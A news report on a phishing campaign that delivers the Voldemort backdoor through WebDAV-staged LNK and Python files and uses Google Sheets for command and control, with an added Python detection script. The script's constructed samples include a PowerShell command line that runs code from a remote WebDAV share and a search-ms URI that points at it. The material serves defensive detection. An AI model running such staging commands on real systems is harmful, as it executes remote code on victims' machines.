Malevolent Actors Exploit Google Sheets for Controlling Malware in Global Spying Campaign

A novel malware campaign has been discovered by cybersecurity experts, utilizing Google Sheets as a control mechanism for malware.

The campaign, first observed by Proofpoint on August 5, 2024, impersonates tax authorities in Europe, Asia, and the United States and has targeted more than 70 organizations worldwide with a custom tool tracked as Voldemort, which gathers information and delivers additional malware payloads.

The sectors being targeted include insurance, aerospace, transportation, education, finance, technology, manufacturing, healthcare, automotive, hospitality, energy, government, media, telecommunications, and nonprofit organizations.

The espionage campaign has not been attributed to a specific threat actor; Proofpoint reports that around 20,000 fraudulent emails were sent as part of it.

The emails claim to come from tax authorities in the U.S., U.K., France, Germany, Italy, India, and Japan. They notify recipients of changes to their tax filings and urge them to click a Google AMP Cache URL that redirects to an intermediary landing page.

The landing page inspects the User-Agent string and, if it indicates Windows, abuses the search-ms: URI protocol handler to open a Windows Explorer search view containing a Windows shortcut (LNK) file disguised as an Adobe Acrobat Reader PDF, in the hope that the victim opens it.

When the LNK file is executed, it launches PowerShell, which runs Python.exe from a third WebDAV share on the same host, passing as its argument a Python script stored on yet another share on that host, according to Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson.

“This prompts Python to execute the script without downloading any files locally, with dependencies being loaded directly from the WebDAV share,” the researchers explained.

The Python script collects system information and sends it, as a Base64-encoded string, to an attacker-controlled domain. It then shows the user a decoy PDF and downloads a password-protected ZIP file from OpenDrive.

The ZIP file contains two components: a legitimate executable, "CiscoCollabHost.exe", that is susceptible to DLL side-loading, and a malicious DLL, "CiscoSparkLauncher.dll" (the Voldemort backdoor), that it side-loads.

Voldemort is a custom backdoor written in C with capabilities for information gathering and loading further malware stages. It uses Google Sheets as its command-and-control (C2) channel, both to receive the commands it executes on the attackers' behalf and to exfiltrate data.

Proofpoint describes the operation as having the hallmarks of an advanced persistent threat (APT) while also borrowing tactics commonly seen in cybercrime.

“Threat actors misuse file schema URIs to access external resources for malware staging, specifically WebDAV and Server Message Block (SMB). This is achieved by leveraging the schema ‘file://’ and pointing to a remote server hosting the malicious content,” the report stated.

This technique has been seen increasingly in malware families used for initial access brokering (IABs), such as Latrodectus, DarkGate, and XWorm.
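The delivery chain above leaves telemetry at three points: an interpreter such as python.exe launched from a WebDAV or SMB share with its script on a remote share, a search-ms: or file:// URI whose location points at a remote host, and a non-browser process talking to the Google Sheets API. The following Python is an added example that flags each of these from constructed log records; it is not Proofpoint's code and not part of the campaign tooling. Field names loosely mimic Sysmon process-creation and network-connection events, every sample record is made up for the example, and sheets.googleapis.com is assumed here as the Sheets API host.

```python
"""Detection helpers for the remote-share staging chain described above.

Added example, not Proofpoint's or the campaign's code. All sample records
are constructed; field names resemble Sysmon Event ID 1 (process create)
and Event ID 3 (network connect) but are an assumption of this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# \\host\share\... or WebDAV forms such as \\host@SSL\DavWWWRoot\... and \\host@8080\...
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)(@(?:SSL|\d{1,5}))?\\([^\s\"']*)", re.IGNORECASE)
INTERPRETERS = ("python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "mshta.exe")
SCRIPT_EXTS = (".py", ".ps1", ".js", ".vbs", ".hta")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")
SHEETS_API_HOST = "sheets.googleapis.com"  # assumption: Google Sheets API endpoint


def remote_references(cmdline):
    """Return (host, is_webdav, path) for every UNC reference in a command line."""
    refs = []
    for m in UNC_RE.finditer(cmdline):
        host, port_tag, path = m.group(1), m.group(2), m.group(3)
        webdav = bool(port_tag) or "davwwwroot" in path.lower()
        refs.append((host.lower(), webdav, path))
    return refs


def assess_event(event):
    """Return the reasons a process-creation event looks like remote-share staging."""
    refs = remote_references(event.get("CommandLine", ""))
    reasons = []
    if any(path.lower().endswith(INTERPRETERS) for _, _, path in refs):
        reasons.append("interpreter executed from a remote share")
    if any(webdav for _, webdav, _ in refs):
        reasons.append("WebDAV share referenced")
    if any(path.lower().endswith(SCRIPT_EXTS) for _, _, path in refs):
        reasons.append("script argument hosted on a remote share")
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    if refs and parent.endswith("explorer.exe") and image.endswith("powershell.exe"):
        reasons.append("explorer.exe -> powershell.exe with UNC arguments (LNK-style launch)")
    return reasons


def is_suspicious(event):
    """A lone remote script path is common in enterprises, so require two signals."""
    return len(assess_event(event)) >= 2


def classify_uri(uri):
    """Label URIs that steer Explorer at remote content; None for anything else."""
    parts = urlsplit(uri)
    scheme = parts.scheme.lower()
    if scheme == "search-ms":
        # search-ms:query=...&crumb=location:\\host\share&displayname=...
        params = parse_qs(parts.path)
        for crumb in params.get("crumb", []):
            m = UNC_RE.search(crumb)
            if m:
                return f"search-ms pointing at remote location {m.group(1).lower()}"
    elif scheme == "file":
        host = parts.netloc.lower()
        if host and host not in ("localhost", "127.0.0.1"):
            return f"file:// to remote host {host}"
    return None


def non_browser_sheets_access(net_events):
    """Return images of non-browser processes that connected to the Sheets API host."""
    hits = []
    for ev in net_events:
        image = ev.get("Image", "").lower()
        if ev.get("DestinationHostname", "").lower() == SHEETS_API_HOST \
                and not image.endswith(BROWSERS):
            hits.append(image)
    return hits


# Constructed samples (not real telemetry), loosely modelled on the chain in the article.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "\\203.0.113.10@80\DavWWWRoot\py\python.exe \\203.0.113.10@80\DavWWWRoot\s\run.py"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\a\notes.txt"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Python312\python.exe",
     "CommandLine": r"python.exe \\fileserver\tools\inventory.py"},
]
SAMPLE_URIS = [
    r"search-ms:query=pdf&crumb=location:\\203.0.113.10@80\DavWWWRoot\docs&displayname=Documents",
    "file://198.51.100.7/share/invoice.lnk",
    "file:///C:/Users/a/x.txt",
    "https://example.com/",
]
SAMPLE_NET_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "sheets.googleapis.com"},
    {"Image": r"C:\Users\a\AppData\Local\Temp\CiscoCollabHost.exe",
     "DestinationHostname": "sheets.googleapis.com"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_suspicious(ev), assess_event(ev))
    for uri in SAMPLE_URIS:
        print(uri, "->", classify_uri(uri))
    print(non_browser_sheets_access(SAMPLE_NET_EVENTS))
```

The two-signal threshold in is_suspicious is deliberate: a script run from an internal file server is routine, but an interpreter itself loaded over WebDAV, or explorer.exe spawning PowerShell with UNC arguments, is not. The search-ms: check parses the crumb= parameter because that is where the remote location lives; a plain hostname match on the URL would miss it.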

Proofpoint also said it was able to read the contents of the Google Sheet, which listed a total of six victims, one of which is believed to be a sandbox or a security researcher.

The campaign is considered atypical: the actors appear to have cast a wide net before narrowing their focus to a handful of targets. The attackers, likely possessing varying levels of technical expertise, are presumed to have intended to compromise multiple organizations.

“While the campaign exhibits characteristics of cybercriminal activities, we believe this is likely an espionage attempt aimed at yet undisclosed final objectives,” the researchers noted.

“The blend of sophisticated and basic capabilities makes it challenging to gauge the threat actors’ capabilities accurately and determine the campaign’s core objectives with certainty.”

The disclosure coincides with Netskope Threat Labs detailing an updated version of Latrodectus (version 1.4) that includes a new C2 endpoint and two new backdoor commands, one to retrieve shellcode from a specified server and one to download arbitrary files from remote locations.

“Latrodectus has been evolving rapidly, incorporating new features into its payload,” remarked security researcher Leandro Fróes. “Understanding the enhancements in its payload enables defense teams to adjust their automated processes and use the information for detecting new variants.”
